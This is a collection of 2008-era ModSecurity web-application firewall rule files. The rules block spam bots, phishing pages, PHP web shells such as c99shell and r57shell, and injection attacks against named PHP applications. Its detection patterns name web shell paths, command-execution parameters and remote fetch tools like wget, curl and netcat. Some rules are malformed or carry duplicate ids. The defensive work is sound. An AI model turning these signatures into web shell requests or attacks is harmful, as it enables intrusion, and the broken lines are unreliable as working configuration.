SecFilterSelective HTTP_USER_AGENT WebZIP "rev:1,deny,id:HGUA200721,severity:2,msg:'Web Leech UA'"
SecFilterSelective HTTP_USER_AGENT WebStripper "rev:1,deny,id:HGUA200722,severity:2,msg:'Web Leech UA'"
SecFilterSelective HTTP_USER_AGENT "teleport pro" "rev:1,deny,id:HGUA200723,severity:2,msg:'Web Leech UA'"
SecFilterSelective HTTP_USER_AGENT combine "rev:1,deny,id:HGUA200724,severity:2,msg:'Web Leech UA'"
SecFilterSelective HTTP_USER_AGENT "Black Hole" "rev:1,deny,id:HGUA200725,severity:2,msg:'Web Leech UA'"
SecFilterSelective HTTP_USER_AGENT "SiteSnagger" "rev:1,deny,id:HGUA200726,severity:2,msg:'Web Leech UA'"
SecFilterSelective HTTP_USER_AGENT "ProWebWalker" "rev:1,deny,id:HGUA200727,severity:2,msg:'Web Leech UA'"
SecFilterSelective HTTP_USER_AGENT "CheeseBot" "rev:1,deny,id:HGUA200728,severity:2,msg:'Web Leech UA'"
SecFilterSelective HTTP_USER_AGENT "hl_ftien_spider" "rev:1,deny,id:HGUA200729,severity:2,msg:'SpamBot UA'"
SecFilterSelective HTTP_USER_AGENT "Mozilla/4\.0 \(compatible\; MSIE 6\.0\; Windows NT 5\.1$" "rev:1,deny,id:HGUA200730,severity:2,msg:'SpamBot UA'"
SecFilterSelective HTTP_USER_AGENT "WebBandit" "rev:1,deny,id:HGUA200731,severity:2,msg:'SpamBot UA'"
SecFilterSelective HTTP_USER_AGENT "WEBMOLE" "rev:1,deny,id:HGUA200732,severity:2,msg:'SpamBot UA'"
SecFilterSelective HTTP_USER_AGENT "Telesoft*" "rev:1,deny,id:HGUA200733,severity:2,msg:'SpamBot UA'"
SecFilterSelective HTTP_USER_AGENT "WebEMailExtractor" "rev:1,deny,id:HGUA200734,severity:2,msg:'SpamBot UA'"
SecFilterSelective HTTP_USER_AGENT "CherryPicker*" "rev:1,deny,id:HGUA200735,severity:2,msg:'SpamBot UA'"
SecFilterSelective HTTP_USER_AGENT NICErsPRO "rev:1,deny,id:HGUA200736,severity:2,msg:'SpamBot UA'"
SecFilterSelective HTTP_USER_AGENT "Advanced Email Extractor*" "rev:1,id:HGUA200737,deny,severity:2,msg:'SpamBot UA'"
SecFilterSelective HTTP_USER_AGENT EmailSiphon "rev:1,deny,id:HGUA200738,severity:2,msg:'SpamBot UA'"
SecFilterSelective HTTP_USER_AGENT Extractorpro "rev:1,deny,id:HGUA200739,severity:2,msg:'SpamBot UA'"
SecFilterSelective HTTP_USER_AGENT webbandit "rev:1,deny,id:HGUA200740,severity:2,msg:'SpamBot UA'"
SecFilterSelective HTTP_USER_AGENT EmailCollector "rev:1,deny,id:HGUA200741,severity:2,msg:'SpamBot UA'"
SecFilterSelective HTTP_USER_AGENT "WebEMailExtrac*" "rev:1,deny,id:HGUA200742,severity:2,msg:'SpamBot UA'"
SecFilterSelective HTTP_USER_AGENT EmailWolf "rev:1,deny,id:HGUA200743,severity:2,msg:'SpamBot UA'"
SecFilterSelective HTTP_USER_AGENT "8484 Boston Project" "rev:1,deny,id:HGUA200734,severity:2,msg:'SpamBot UA'"
SecFilterSelective HTTP_USER_AGENT ".*fantomBrowser" "rev:1,deny,severity:2,id:HGUA200744,msg:'SpamBot UA'"
SecFilterSelective HTTP_USER_AGENT ".*fantomCrew Browser" "rev:1,deny,id:HGUA200745,severity:2,msg:'SpamBot UA'"
SecFilterSelective HTTP_USER_AGENT "DTS Agent" "rev:1,deny,id:HGUA200746,severity:2,msg:'SpamBot UA'"
SecFilterSelective HTTP_USER_AGENT "POE-Component-Client" "rev:1,deny,id:HGUA200747,severity:2,msg:'SpamBot UA'"
SecFilterSelective HTTP_USER_AGENT "WISEbot" "rev:1,deny,id:HGUA200748,severity:2,msg:'SpamBot UA'"
SecFilterSelective HTTP_USER_AGENT "^Shockwave Flash" "rev:1,deny,id:HGUA200749,severity:2,msg:'SpamBot UA'"
SecFilterSelective HTTP_USER_AGENT "Missigua" "rev:1,deny,id:HGUA200750,severity:2,msg:'SpamBot UA'"
SecFilterSelective HTTP_USER_AGENT "^www\.weblogs\.com" "rev:1,deny,id:HGUA200751,severity:2,msg:'Comment/Referrer Spam UA'"
SecFilterSelective HTTP_USER_AGENT "compatible \; MSIE" "rev:1,deny,id:HGUA200752,severity:2,msg:'Comment/Referrer Spam UA'"
SecFilterSelective HTTP_USER_AGENT "<(.|\s|\n)?(script|about|applet|activex|chrome|object)(.|\s|\n)?>.*<(.|\s|\n)?(script|about|applet|activex|chrome|object)" "rev:1,deny,severity:2,msg:'UA Field XSS Exploit Attempt'"
SecFilterSelective HTTP_USER_AGENT "(<\?php|<[[:space:]]*\?[[:space:]]*php)" "rev:1,deny,id:HGUA200754,severity:2,msg:'UA Field Exploit Attempt'"
SecFilterSelective HTTP_USER_AGENT ".*HTTP_GET_VARS" "rev:1,deny,severity:2,id:HGUA200755,msg:'UA Field Exploit Attempt'"
SecFilterSelective HTTP_USER_AGENT "\.\./\.\." "rev:1,deny,severity:2,id:HGUA200756,msg:'UA Field Recusion Attack'"

# ---------------------------------------------------------------
# ---------------------------------------------------------------

# modsec-01.forms.conf: 2008-03-28 13:55:25.000000000 -0500: jshanley@

SecFilterSelective ARGS_VALUES "\n[[:space:]]*(to|bcc|cc)[[:space:]]*:.*@" "rev:1,id:HG2007063002,severity:5,msg:'HG: php Mail Injection attempt'"

# ---------------------------------------------------------------
# ---------------------------------------------------------------

# modsec-01.fraud.conf: 2008-03-30 18:39:36.000000000 -0500: jshanley@

SecFilterSelective REQUEST_URI "/(.+)online\.lloydstsb\.co\.uk/" "rev:1,id:HG2007070601,severity:1,msg:'HG: Bank Fraud Page',log,redirect:http://www.secretservice.gov/financial_crimes.shtml"
SecFilterSelective REQUEST_URI "CentroDeSeguridadVisa_Particulares\.com" "rev:1,id:HG2007070602,severity:1,msg:'HG: Bank Fraud Page',log,redirect:http://www.secretservice.gov/financial_crimes.shtml"
SecFilterSelective REQUEST_URI "/wellsfargo.com\.htm" "rev:1,id:HG2007070603,severity:1,msg:'HG: Bank Fraud Page',log,redirect:http://www.secretservice.gov/financial_crimes.shtml"
SecFilterSelective REQUEST_URI "/(.+)royalbank\.com/" "rev:1,id:HG2007070606,severity:1,msg:'HG: Bank Fraud Page',log,redirect:http://www.secretservice.gov/financial_crimes.shtml"
SecFilterSelective REQUEST_URI "/(.+)online\.lloydstsb\.co\.uk/" "rev:1,id:HG2007070607,severity:1,msg:'HG: Bank Fraud Page',log,redirect:http://www.secretservice.gov/financial_crimes.shtml"
SecFilterSelective REQUEST_URI "/(.+)bankofamerica\.com/" "rev:1,id:HG2007070608,severity:1,msg:'HG: Bank Fraud Page',log,redirect:http://www.secretservice.gov/financial_crimes.shtml"
SecFilterSelective REQUEST_URI "/(.+)paypal\.com/" "rev:1,id:HG2008030101,severity:1,msg:'HG: Bank Fraud Page',log,redirect:http://www.secretservice.gov/financial_crimes.shtml"
SecFilterSelective REMOTE_ADDR "195\.161\.119\.{1,3}$" "rev:1,msg:'Russian chat.ru fraud'"
SecFilterSelective REMOTE_HOST "\.chat\.ru$" "rev:1,msg:'Russian chat.ru fraud'"

# ---------------------------------------------------------------
# ---------------------------------------------------------------

# modsec-01.iframes.conf: 2008-03-28 13:55:25.000000000 -0500: jshanley@

SecFilterSelective HTTP_REFERER|REMOTE_HOST "simocrogger\.ws" "rev:1,severity:5,deny:503,msg:'IFRAME: Malicious (flash)'"

# ---------------------------------------------------------------
# ---------------------------------------------------------------

# modsec-01.shells.conf: 2008-03-28 13:55:25.000000000 -0500: jshanley@

SecFilterSelective REQUEST_URI "/(cse|cmd)\.(c|dat|gif|jpe?g|jpeg|png|sh|txt|bmp|dat|txt|js|html?|tmp|php|asp)\?"
SecFilterSelective THE_REQUEST "/(cse|cmd)\.(c|dat|gif|jpe?g|jpeg|png|sh|txt|bmp|dat|txt|js|html?|tmp|php|asp) "
SecFilterSelective REQUEST_URI "/terminatorX-exp.*\.(gif|jpe?g|txt|bmp|php|png)\?"
SecFilterSelective REQUEST_URI "/\.it/viewde"
SecFilterSelective REQUEST_URI "/cmd\?&(command|cmd)="
SecFilterSelective REQUEST_URI "/cmd\.php\.ns\?&(command|cmd)="
SecFilterSelective REQUEST_URI "/cmd\.(php|dat)\?&(command|cmd)="
SecFilterSelective REQUEST_URI "/(a|ijoo|oinc|s|sep|pro18|shell|(o|0|p)wn(e|3)d)\.(c|dat|gif|jpe?g|jpeg|png|sh|txt|bmp|dat|txt|js|htm|html|tmp|php|asp).\?&(cmd|command)="
SecFilterSelective REQUEST_URI "/(new(cmd|command)|(cmd|command)[0-9]+|pro18|shell|sh|bash|get|root|spy|nmap|asc|lila)\.(c|dat|gif|jpe?g|jpeg|png|sh|txt|bmp|dat|txt|js|htm|html|tmp|php|asp)\?"
SecFilterSelective REQUEST_URI "/[a-z]?(cmd|command)[0-9]?\.(gif|jpe?g|txt|bmp|png)\?"
SecFilterSelective REQUEST_URI "/(gif|jpe?g|ion|lala|shell|phpshell)\.ph(p(3|4)?|tml)\?"
SecFilterSelective REQUEST_URI "/tool[12][0-9]?\.(ph(p(3|4)?|tml)|js)\?"
SecFilterSelective REQUEST_URI "perl (xpl\.pl|kut|viewde|httpd\.txt)"
SecFilterSelective THE_REQUEST "\./xkernel\;"
SecFilterSelective THE_REQUEST "/kaiten\.c"
SecFilterSelective REQUEST_URI "/mampus\?&(cmd|command)"
SecFilterSelective REQUEST_URI "perl .*\.pl(\s|\t)*\;"
SecFilterSelective REQUEST_URI "\;(\s|\t)*perl .*\.pl"
SecFilterSelective REQUEST_URI "/tool(12)?[0-9]?\.(d(ao)t|gif|jpe?g|bmp|txt|png|asp)\?&?(cmd|command)="
SecFilterSelective REQUEST_URI "/tool\.(d(ao)t|gif|jpe?g|bmp|txt|png|asp)\?&?(cmd|command)="
SecFilterSelective REQUEST_URI "/tool25\.(d(ao)t|gif|jpe?g|bmp|txt|png|asp)\?&?(cmd|command)="
SecFilterSelective REQUEST_URI "/therules25\.(d(ao)t|gif|jpe?g|bmp|txt|png|asp)\?&?(cmd|command)="
SecFilterSelective REQUEST_URI "/xpl\.php\?&(cmd|command)="
SecFilterSelective REQUEST_URI "/(ssh2?|sfdg2)\.php"
SecFilterSelective THE_REQUEST "/\.dump/(bash|httpd)(\;|\w)"
SecFilterSelective THE_REQUEST "/\.dump/(bash|httpd)\.(txt|php|gif|jpe?g|dat|bmp|png)(\;|\w)"
SecFilterSelective REQUEST_URI "/dblib\.php\?&(cmd|command)="
SecFilterSelective THE_REQUEST|HTTP_Content-Disposition "/(suntzu.*|suntzu)\.php\?cmd="
SecFilterSelective THE_REQUEST "/proxysx\.(gif|jpe?g|bmp|txt|asp|png)\?"
SecFilterSelective THE_REQUEST "/(phpbackdoor|phpbackdoor.*)\.php\?cmd="
SecFilterSelective REQUEST_URI "/oops?&"
SecFilterSelective THE_REQUEST "wiki_up/.*\.(php(3|4)?|tml|cgi|sh)"
SecFilterSelective THE_REQUEST "(wiki_up|temp)/(gif|ion|jpe?g|lala)\.ph(p(3|4)?|tml)"
SecFilterSelective THE_REQUEST "/(too20|phpshell|shell)\.ph(p(3|4)?|tml)"
SecFilterSelective REQUEST_URI "/phpterm"
SecFilterSelective THE_REQUEST "(netenberg |psybnc |fantastico_de_luxe |arta\.zip )"
SecFilterSelective REQUEST_URI "/iblis\.htm\?"
SecFilterSelective REQUEST_URI "/gif\.gif\?"
SecFilterSelective REQUEST_URI "/go\.php\.txt\?"
SecFilterSelective REQUEST_URI "/sh[0-9]\.(gif|jpe?g|txt|bmp|png)\?"
SecFilterSelective REQUEST_URI "/iys\.(gif|jpe?g|txt|bmp|png)\?"
SecFilterSelective REQUEST_URI "/shell[0-9]\.(gif|jpe?g|txt|bmp|png)\?"
SecFilterSelective REQUEST_URI "/zehir\.asp"
SecFilterSelective REQUEST_URI "/aflast\.txt\?"
SecFilterSelective REQUEST_URI "/sikat\.txt\?&cmd"
SecFilterSelective REQUEST_URI "/t\.gif\?"
SecFilterSelective REQUEST_URI "/phpbb_patch\?&"
SecFilterSelective REQUEST_URI "/phpbb2_patch\?&"
SecFilterSelective REQUEST_URI "/lukka\?&"
SecFilterSelective REQUEST_URI "/c99shell\.txt"
SecFilterSelective REQUEST_URI "/c99\.txt\?"
SecFilterSelective REQUEST_URI "/shell\.php\&cmd="
SecFilterSelective ARGS "/shell\.php\&cmd="
SecFilterSelective THE_REQUEST "HiMaster\!\<\?php system\("
SecFilterSelective THE_REQUEST "error_reporting\(.*\)\;if\(isset\(.*\)\)\{system"
SecFilterSelective REQUEST_URI "help_text_vars\.php\?suntzu="
SecFilterSelective REQUEST_URI "/docLib/cmd\.asp"
SecFilterSelective REQUEST_URI "\.asp\?pageName=AppFileExplorer"
SecFilterSelective REQUEST_URI "\.asp\?.*showUpload&thePath="
SecFilterSelective REQUEST_URI "\.asp\?.*theAct=inject&thePath="
SecFilterSelective REQUEST_URI "\.php\?act=(chmod&f|cmd|f&f=|ls|img&img=)"
SecFilterSelective REQUEST_URI "shell\.txt"
SecFilterSelective REQUEST_URI "w00tw00t\.at\.ISC\.SANS\.DFind"
SecFilterSelective POST_PAYLOAD "((stripslashes|passthru)\(\$_REQUEST\[\"|if \(get_magic_quotes_gpc\()"
SecFilterSelective THE_REQUEST "PUT /.*_@@RNDSTR@@"
SecFilterSelective THE_REQUEST "trojan\.htm"
SecFilterSelective REQUEST_URI "/r57en\.php"
SecFilterSelective REQUEST_URI "btn_lists\.(gif|jpe?g|txt|bmp|png)\?"
SecFilterSelective REQUEST_URI "dsoul/tool\?"
SecFilterSelective REQUEST_URI "anggands\.(gif|jpe?g|txt|bmp|png)\?"
SecFilterSelective REQUEST_URI "newfile[0-9]\.(gif|jpe?g|txt|bmp|png)\?"
SecFilterSelective REQUEST_URI "/vsf\.vsf\?&"
SecFilterSelective REQUEST_URI "/scan1\.0/scan/"
SecFilterSelective REQUEST_URI "test\.txt\?&"
SecFilterSelective REQUEST_URI "\.k4ka\.txt\?"
SecFilterSelective REQUEST_URI "/php\.txt\?"
SecFilterSelective REQUEST_URI "/sql\.txt\?"
SecFilterSelective REQUEST_URI "bind\.(gif|jpe?g|txt|bmp|png)\?"
SecFilterSelective REQUEST_URI "/juax\.(gif|jpe?g|txt|bmp|png)\?"
SecFilterSelective REQUEST_URI "/linuxdaybot/\.(gif|jpe?g|txt|bmp|png)\?"
SecFilterSelective THE_REQUEST "/c99shell"
SecFilterSelective THE_REQUEST "/shell\.php\&cmd="
SecFilterSelective THE_REQUEST "\act=ls\&d=" chain
SecFilterSelective THE_REQUEST "\&sort=0a" "msg:'c99shell'"
SecFilterSelective THE_REQUEST "\act=(search|fsbuff|encoder|tools|processes|ftpquickbrute|security|sql|eval|
update|feedback)\&d=" "msg:'c99shell'"
SecFilter "/tmp/cmdtemp"
SecFilterSelective THE_REQUEST "cmdtemp"
SecFilter "/tmp/back"
SecFilter "/tmp/pi.pl"
SecFilterSelective THE_REQUEST "sess31002"
SecFilterSelective THE_REQUEST "ssh-scan"
SecFilterSelective THE_REQUEST "/<\?php\x20"
SecFilterSelective THE_REQUEST "r57shell"
SecFilterSelective THE_REQUEST "step57.info"
SecFilterSelective POST_PAYLOAD "step57.info"
SecFilterSelective THE_REQUEST "\&cmd=/usr/bin/pe"
SecFilterSelective THE_REQUEST "cmd=echo\x20"
SecFilterSelective POST_PAYLOAD "cmd=" chain
SecFilterSelective POST_PAYLOAD "dir=" chain
SecFilterSelective POST_PAYLOAD "submit=" "msg:'r57shell 1'"
SecFilterSelective THE_REQUEST "wh4.whsrv.com" "msg:'r57shell 2'"
SecFilterSelective POST_PAYLOAD "wh4.whsrv.com" "msg:'r57shell 2'"
SecFilterSelective THE_REQUEST "rst.void.ru" "msg:'r57shell 3'"
SecFilterSelective POST_PAYLOAD "rst.void.ru" "msg:'r57shell 3'"
SecFilterSelective POST_PAYLOAD "alias=(find|list|show|ls|uname|who|pwd|uptime)" chain
SecFilterSelective POST_PAYLOAD "submit=" "msg:'r57shell 5'"
SecFilterSelective POST_PAYLOAD "cmd=(find|list|show|ls|uname|who|pwd|uptime|wget|GET|gcc|links|lynx|fetch|curl)" chain
SecFilterSelective POST_PAYLOAD "submit=" "msg:'r57shell 6'"
SecFilterSelective POST_PAYLOAD "s_text=" chain
SecFilterSelective POST_PAYLOAD "s_dir=" chain
SecFilterSelective POST_PAYLOAD "s_mask=" chain
SecFilterSelective POST_PAYLOAD "cmd=" chain
SecFilterSelective POST_PAYLOAD "submit=" "msg:'r57shell 7'"
SecFilterSelective POST_PAYLOAD "with=" chain
SecFilterSelective POST_PAYLOAD "rem_file=" chain
SecFilterSelective POST_PAYLOAD "loc_file=" chain
SecFilterSelective POST_PAYLOAD "submit=" "msg:'r57shell 8'"
SecFilterSelective POST_PAYLOAD "bind_pass=" chain
SecFilterSelective POST_PAYLOAD "submit=" "msg:'r57shell 9'"
SecFilterSelective POST_PAYLOAD "use=(C|Perl)" chain
SecFilterSelective POST_PAYLOAD "submit=" "msg:'r57shell 10'"
SecFilterSelective THE_REQUEST "\act=f\&f=" chain
SecFilterSelective THE_REQUEST "\&d=" "msg:'c99shell'"
SecFilterSelective THE_REQUEST "\act=f\&f=" chain
SecFilterSelective THE_REQUEST "\&ft=(info|edit|download)\&d=" "msg:'c99shell'"
SecFilterSelective POST_PAYLOAD "\actarcbuff_path=" chain
SecFilterSelective POST_PAYLOAD "\act=" "msg:'c99shell'"
SecFilterSelective POST_PAYLOAD "act=cmd\&d=" chain
SecFilterSelective POST_PAYLOAD "\&cmd=" chain
SecFilterSelective POST_PAYLOAD "\&submit=Execute" "msg:'c99shell'"
SecFilterSelective POST_PAYLOAD "act=(search|upload|mkdir|mkfile|ls|gofile)" chain
SecFilterSelective POST_PAYLOAD "search_name_regexp=" chain
SecFilterSelective POST_PAYLOAD "search_name=" chain
SecFilterSelective POST_PAYLOAD "d=" "msg:'c99shell'"
SecFilterSelective POST_PAYLOAD "dir" chain
SecFilterSelective POST_PAYLOAD "new_name" chain
SecFilterSelective POST_PAYLOAD "submit" "msg:'r57shell upload'"
SecFilterSelective POST_PAYLOAD "d_name=" chain
SecFilterSelective POST_PAYLOAD "cmd=" chain
SecFilterSelective POST_PAYLOAD "dir=" chain
SecFilterSelective POST_PAYLOAD "submit" "msg:'r57shell 4'"
SecFilter "(cmd|command)=(cd|\;|perl |python |rpm |yum |apt-get |emerge |lynx |links |mkdir |elinks |cmd|pwd|wget |lwp-(download|request|mirror|rget) |id|uname|cvs |svn |(s|r)(cp|sh) |net(stat|cat) |rexec |smbclient |t?ftp |ncftp |curl |telnet |gcc |cc |g\+\+ |whoami|\./|killall |rm \-[a-z|A-Z])" "rev:1,log,deny,msg:'Mallicious Activity'"

# ---------------------------------------------------------------
# ---------------------------------------------------------------

# modsec-02.dos.conf: 2008-04-16 18:15:07.000000000 -0500: jshanley@

SecFilterSelective REQUEST_URI "and.+char\(.*\).+user.+char\(.*\)"
SecFilterSelective THE_REQUEST "select.*from.*information_schema\.tables"

# ---------------------------------------------------------------
# ---------------------------------------------------------------

# modsec-4images.conf: 2008-03-28 13:55:25.000000000 -0500: jshanley@

SecFilterSelective REQUEST_URI "/config\.dist\.php\?" "rev:1,id:HG2007071401,deny,severity:5,msg:'RDT: 4Images 1.7.x CVE-2006-0899'"
SecFilterSelective REQUEST_URI "/index\.php\?template=\.\." "rev:1,id:HG2007071402,deny,severity:5,msg:'RDT: 4Images 1.7.x CVE-2006-0899'"
SecFilterSelective REQUEST_URI "/(top\.php|member\.php|search\.php)\?" "chain,rev:1,id:HG2007071403,deny,severity:5,msg:'RDT: 4Images 1.7.x CVE-2006-2214 CVE-2006-5236'"
SecFilterSelective REQUEST_URI "(search_user=|sessionid=)" chain
SecFilterSelective REQUEST_URI "(JOIN|SELECT|\*\*|DROP|OR|union|user_password|user_name|images_users|where)"
SecFilterSelective REQUEST_URI "/search\.php\?" "chain,rev:1,id:HG2007071201,deny,severity:5,msg:'SQLi: 4Images 1.7.x CVE-2006-5236'"
SecFilterSelective REQUEST_URI "search_user=.*(user_password|user_name|images_users|union|concat)"

# ---------------------------------------------------------------
# ---------------------------------------------------------------

# modsec-advancedguestbook.conf: 2008-03-28 13:55:25.000000000 -0500: jshanley@


# ---------------------------------------------------------------
# ---------------------------------------------------------------

# modsec-auctionsphp.conf: 2008-03-28 13:55:25.000000000 -0500: jshanley@

SecFilterSelective REQUEST_URI "/includes/errors\.php\?" "chain,rev:1,id:HG2007111601,deny,severity:5,msg:'AuctionPHP RFI: error='"
SecFilterSelective ARG_error "(\.\./\.\.|/|(http|https|ftp)\:/)"
SecFilterSelective REQUEST_URI "/includes/(settings|messages)\.inc\.php\?" "chain,rev:1,id:HG2007111602,deny,severity:5,msg:'AuctionPHP RFI: include_path='"
SecFilterSelective ARG_include_path "(\.\./\.\.|/|(http|https|ftp)\:/)"

# ---------------------------------------------------------------
# ---------------------------------------------------------------

# modsec-awstats.conf: 2008-03-28 13:55:25.000000000 -0500: jshanley@

SecFilterSelective THE_REQUEST "awstats" chain
SecFilterSelective ARGS "(pluginmode|loadplugin|debug|configdir|perl|cgi|chmod|exec|print)"
SecFilterSelective REQUEST_URI "/awstats\.pl\?(configdir|update|pluginmode|cgi)=(\||echo|\:system\()"
SecFilterSelective REQUEST_URI "/awstats\.pl\?(debug=1|pluginmode=rawlog\&loadplugin=rawlog|update=1\&logfile=\|)"
SecFilterSelective REQUEST_URI "/awstats\.pl\?[^\r\n]*logfile=\|"
SecFilterSelective REQUEST_URI "/awstats\.pl\?configdir="
SecFilterSelective REQUEST_URI "awstats\.pl\?" chain
SecFilterSelective ARGS "(debug|configdir|perl|chmod|exec|print|cgi)"
SecFilterSelective THE_REQUEST "/awstats\.pl HTTP\/(0\.9|1\.0|1\.1)$" "rev:1,deny,msg:'AWStats Exploit Probe'"

# ---------------------------------------------------------------
# ---------------------------------------------------------------

# modsec-bosclassifieds.conf: 2008-03-28 13:55:25.000000000 -0500: jshanley@

SecFilterSelective REQUEST_URI "/index\.php\?" chain
SecFilterSelective ARG_insPath "(\.\./\.\.|/|(http|https|ftp)\:/)"

# ---------------------------------------------------------------
# ---------------------------------------------------------------

# modsec-confixxserver.conf: 2008-03-28 13:55:25.000000000 -0500: jshanley@

SecFilterSelective REQUEST_URI "/admin/business_inc/saveserver\.php\?" "chain,rev:1,deny,log,msg:'Confixx RFI'"
SecFilterSelective ARG_thisdir "(\.\./\.\.|/|(http|https|ftp)\:/)"

# ---------------------------------------------------------------
# ---------------------------------------------------------------

# modsec-coppermine.conf: 2008-03-28 13:55:25.000000000 -0500: jshanley@

SecFilterSelective REQUEST_URI "/index\.php\?lang=.*((javascript|script|about|applet|activex|chrome)*>|html|(http|https|ftp):/)"
SecFilterSelective REQUEST_URI "/albmgr\.php\?" "chain,rev:1,id:HG2007063006,deny:503,severity:5,msg:'HG: SQLi: CopperMine'"
SecFilterSelective ARG_cat "(user_name|user_password|union|drop|select|truncate|from|concat)"
SecFilterSelective REQUEST_URI "/relocate_server\.php"
SecFilterSelective REQUEST_URI "/theme\.php\?" "chain,rev:1,id:HG2007102010,deny:503,severity:5,msg:'HG: RFI: CopperMine'"
SecFilterSelective ARG_THEME_DIR "(\.\./\.\.|/|(http|https|ftp)\:/)"
SecFilterSelective REQUEST_URI "/index\.php\?" "chain,rev:1,id:HG2007102601,deny,log,msg:'Coppermine XSS'"
SecFilterSelective ARG_lang "((javascript|script|about|applet|activex|chrome)*\>|html|(http|https|ftp)\:/)"

# ---------------------------------------------------------------
# ---------------------------------------------------------------

# modsec-cubecart.conf: 2008-03-28 13:55:25.000000000 -0500: jshanley@

SecFilterSelective REQUEST_URI "/index\.php\?&PHPSESSID=\'"
SecFilterSelective REQUEST_URI "/tellafriend\.php\?&product=\'"
SecFilterSelective REQUEST_URI "/view_cart\.php\?add=\'"
SecFilterSelective REQUEST_URI "/view_product\.php\?product=\'"
SecFilterSelective REQUEST_URI "/orderSuccess\.inc\.php\?" chain
SecFilterSelective ARG_[rootDir] "(\.\./\.\.|/|(http|https|ftp)\:/)"

# ---------------------------------------------------------------
# ---------------------------------------------------------------

# modsec-dotproject.conf: 2008-03-28 13:55:25.000000000 -0500: jshanley@

SecFilterSelective REQUEST_URI "/index\.php\?m=(companies|projects)" "chain,rev:1,id:HG2007101881,deny,severity:5,msg:'dotProject AuthBypass'"
SecFilterSelective "ARG_user_cookie" "1"
SecFilterSelective "ARG_baseDir" "(\.\./\.\.|/|(http|https|ftp)\:/)" "rev:1,id:HG2007101880,deny,severity:5,msg:'dotProject RFI'"
SecFilterSelective "ARG_dPconfig[root_dir]" "(\.\./\.\.|/|(http|https|ftp)\:/)" "rev:1,id:HG2007101883,deny,severity:5,msg:'dotProject RFI'"
SecFilterSelective REQUEST_URI "/docs/(check|phpinfo)\.php" "rev:1,id:HG2007101882,deny,severity:5,msg:'dotProject Info Disclosure'"

# ---------------------------------------------------------------
# ---------------------------------------------------------------

# modsec-drupal.conf: 2008-03-28 13:55:25.000000000 -0500: jshanley@

SecFilter "\<.*php .*\(.*\)\;system\(.*\).*php*\>"
SecFilter "\<.*php .*\(.*\)\;(chr|fwrite|fopen|system|echr|passthru|popen|proc_open|shell_exec|exec|proc_nice|proc_terminate|proc_get_status|proc_close|pfsockopen|leak|apache_child_terminate|posix_kill|posix_mkfifo|posix_setpgid|posix_setsid|posix_setuid|phpinfo)\(.*\).*php*\>"

# ---------------------------------------------------------------
# ---------------------------------------------------------------

# modsec-esupport.conf: 2008-03-28 13:55:25.000000000 -0500: jshanley@

SecFilterSelective REQUEST_URI "/autoclose\.php\?" chain
SecFilterSelective ARG_subd "(http|https|ftp)\:/"

# ---------------------------------------------------------------
# ---------------------------------------------------------------

# modsec-fantastico.conf: 2008-03-28 13:55:25.000000000 -0500: jshanley@

SecFilterSelective REQUEST_URI "/config\.dist\.php\?" "rev:1,id:HG2007071401,deny,severity:5,msg:'RDT: 4Images 1.7.x CVE-2006-0899'"
SecFilterSelective REQUEST_URI "/index\.php\?template=\.\." "rev:1,id:HG2007071402,deny,severity:5,msg:'RDT: 4Images 1.7.x CVE-2006-0899'"
SecFilterSelective REQUEST_URI "/(top\.php|member\.php|search\.php)\?" "chain,rev:1,id:HG2007071403,deny,severity:5,msg:'RDT: 4Images 1.7.x CVE-2006-2214 CVE-2006-5236'"
SecFilterSelective REQUEST_URI "(search_user=|sessionid=)" chain
SecFilterSelective REQUEST_URI "(JOIN|SELECT|\*\*|DROP|OR|union|user_password|user_name|images_users|where)"
SecFilterSelective REQUEST_URI "(common\.inc\.php|comments\.php|booth\.php|page\.php|png\.php|poll_ssi\.php|popup\.php)" "chain,rev:1,id:HG2007071403,deny,severity:5,msg:'RDT: 4Images 1.7.x CVE-2006-2214 '"
SecFilterSelective REQUEST_URI "(base_path|template_set|id|action)=" "chain"
SecFilterSelective REQUEST_URI "\;"
SecFilterSelective REQUEST_URI "/import-mt\.php\?" "chain,rev:1,id:HG2007071810,deny,severity:5,msg:'RFI: b2Evolution: CVE-2006-6417'"
SecFilterSelective REQUEST_URI "(basepath|inc_path)=(http|https|ftp)\:"
SecFilterSelective REQUEST_URI "(init\.inc\.php|theme\.php)\?" "chain,rev:1,id:HG2007071811,deny,severity:5,msg:'RFI: CopperMine SA11524'"
SecFilterSelective REQUEST_URI "(CPG_M_DIR|THEME_DIR)=(http|https|ftp)\:"
SecFilterSelective REQUEST_URI "/init\.inc\.php\?" "chain,rev:1,id:HG2007071812,deny,severity:5,msg:'RFI: CopperMine SA11524'"
SecFilterSelective REQUEST_URI "(JOIN|SELECT|\*\*|DROP|OR|union|user_password|user_name|images_users|where)
SecFilterSelective REQUEST_URI "/relocate_server\.php" "rev:1,id:HG2007071813,deny,severity:5,msg:'CVE-2005-3979: CopperMine config exposure'"
SecFilterSelective REQUEST_URI "/thumbnails\.php\?=" "chain,rev:1,id:HG2007071814,deny,severity:5,msg:'CVE-2006-0872/3: CopperMine Shellcode Exec'"
SecFilterSelective REQUEST_URI "\.\.|(http|https|ftp)\:"
SecFilterSelective REQUEST_URI "/index\.php\?file=" "chain,rev:1,id:HG2007071815,deny,severity:5,msg:'CVE-2006-1909: CopperMine RFI'"
SecFilterSelective REQUEST_URI "(\.\.|\./)"
SecFilterSelective REQUEST_URI "/(usermgr\.php|db_ecard\.php|albmgr\.php)\?" "chain,rev:1,id:HG2007071816,deny,severity:5,msg:'CVE-2006-3064: CopperMine RFI'"
SecFilterSelective REQUEST_URI "(SELECT|FROM|WHERE|ORDER BY|LIMIT|JOIN|SELECT|DROP|union)"
SecFilterSelective REQUEST_URI "/picmgr\.php\?" "chain,rev:1,id:HG2007071817,deny,severity:5,msg:'CVE-2006-5622: CopperMine RFI'"
SecFilterSelective REQUEST_URI "aid=" "chain"
SecFilterSelective REQUEST_URI "(SELECT|FROM|WHERE|ORDER BY|LIMIT|JOIN|SELECT|DROP|UNION)"
SecFilterSelective REQUEST_URI "/E2_header\.inc\.php\?" "chain,rev:1,id:HG2007071818,deny,severity:5,msg:'CVE-2007-0835: CopperMine RFI'"
SecFilterSelective REQUEST_URI "boarddir=(http|https|ftp)\:"
SecFilterSelective REQUEST_URI "/slides\.php\?" "chain,rev:1,id:HG2007071819,deny,severity:5,msg:'SA11789: Crafty Syntax'"
SecFilterSelective REQUEST_URI "limitquery_s=" "chain"
SecFilterSelective REQUEST_URI "%5cx61%5cx6e%5cx64%5cx20%5cx31%5cx3d%5cx30%5cx20%5cx75%5cx6e%5cx69%5cx6f%5cx6e%5cx20"
